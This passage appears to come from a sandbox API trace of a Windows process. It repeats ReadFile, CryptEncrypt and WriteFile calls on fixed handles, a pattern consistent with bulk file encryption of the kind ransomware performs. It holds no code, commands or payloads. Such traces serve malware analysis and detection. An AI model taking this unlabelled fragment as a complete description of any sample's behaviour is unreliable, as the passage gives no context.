lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0284.025] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5e5d8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0284.025] CryptEncrypt (in: hKey=0x2fc448, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0284.025] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e5d8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0284.025] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5e5d8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0284.025] CryptEncrypt (in: hKey=0x2fc448, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0284.025] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e5d8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0284.025] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5e5d8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0284.025] CryptEncrypt (in: hKey=0x2fc448, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0284.025] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e5d8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0284.026] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5e5d8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0284.026] CryptEncrypt (in: hKey=0x2fc448, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0284.026] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e5d8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0284.026] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5e5d8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0284.026] CryptEncrypt (in: hKey=0x2fc448, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0284.026] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e5d8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0284.026] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5e5d8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0284.026] CryptEncrypt (in: hKey=0x2fc448, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0284.026] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e5d8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0284.026] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5e5d8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0284.026] CryptEncrypt (in: hKey=0x2fc448, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0284.026] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e5d8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0284.026] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5e5d8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0284.026] CryptEncrypt (in: hKey=0x2fc448, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0284.026] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e5d8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0284.027] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5e5d8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0284.027] CryptEncrypt (in: hKey=0x2fc448, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0284.027] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e5d8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0284.027] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5e5d8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0284.027] CryptEncrypt (in: hKey=0x2fc448, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0284.027] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e5d8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0284.027] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5e5d8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0284.027] CryptEncrypt (in: hKey=0x2fc448, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0284.027] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e5d8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0284.027] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5e5d8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0284.027] CryptEncrypt (in: hKey=0x2fc448, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0284.027] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e5d8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0284.027] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5e5d8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0284.028] CryptEncrypt (in: hKey=0x2fc448, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0284.028] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e5d8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0284.028] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5e5d8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0284.028] CryptEncrypt (in: hKey=0x2fc448, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0284.028] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e5d8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0284.028] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5e5d8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0284.028] CryptEncrypt (in: hKey=0x2fc448, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0284.028] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e5d8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0284.028] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5e5d8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0284.028] CryptEncrypt (in: hKey=0x2fc448, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0284.028] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e5d8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0284.028] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5e5d8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0284.028] CryptEncrypt (in: hKey=0x2fc448, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0284.028] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e5d8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0284.028] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5e5d8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0284.029] CryptEncrypt (in: hKey=0x2fc448, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0284.029] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e5d8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0284.029] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5e5d8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0284.029] CryptEncrypt (in: hKey=0x2fc448, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0284.029] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e5d8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0284.029] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5e5d8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0284.029] CryptEncrypt (in: hKey=0x2fc448, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0284.029] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e5d8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0284.029] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5e5d8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0284.029] CryptEncrypt (in: hKey=0x2fc448, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0284.029] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e5d8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0284.029] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5e5d8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0284.029] CryptEncrypt (in: hKey=0x2fc448, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0284.029] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e5d8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0284.030] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5e5d8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0284.030] CryptEncrypt (in: hKey=0x2fc448, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0284.030] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e5d8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0284.030] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5e5d8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0284.030] CryptEncrypt (in: hKey=0x2fc448, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0284.030] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e5d8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0284.030] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5e5d8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0284.030] CryptEncrypt (in: hKey=0x2fc448, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0284.030] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e5d8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0284.030] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5e5d8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0284.030] CryptEncrypt (in: hKey=0x2fc448, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0284.030] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e5d8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0284.030] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5e5d8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0284.030] CryptEncrypt (in: hKey=0x2fc448, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0284.030] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e5d8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0284.031] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5e5d8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0284.031] CryptEncrypt (in: hKey=0x2fc448, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0287.467] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e5d8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0287.468] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5e5d8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0287.468] CryptEncrypt (in: hKey=0x2fc448, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0287.468] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e5d8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0287.468] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5e5d8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0287.468] CryptEncrypt (in: hKey=0x2fc448, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0287.468] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e5d8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0287.468] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5e5d8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0287.468] CryptEncrypt (in: hKey=0x2fc448, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0287.468] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e5d8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0287.468] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5e5d8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0287.468] CryptEncrypt (in: hKey=0x2fc448, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0287.468] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e5d8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0287.471] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5e5d8, 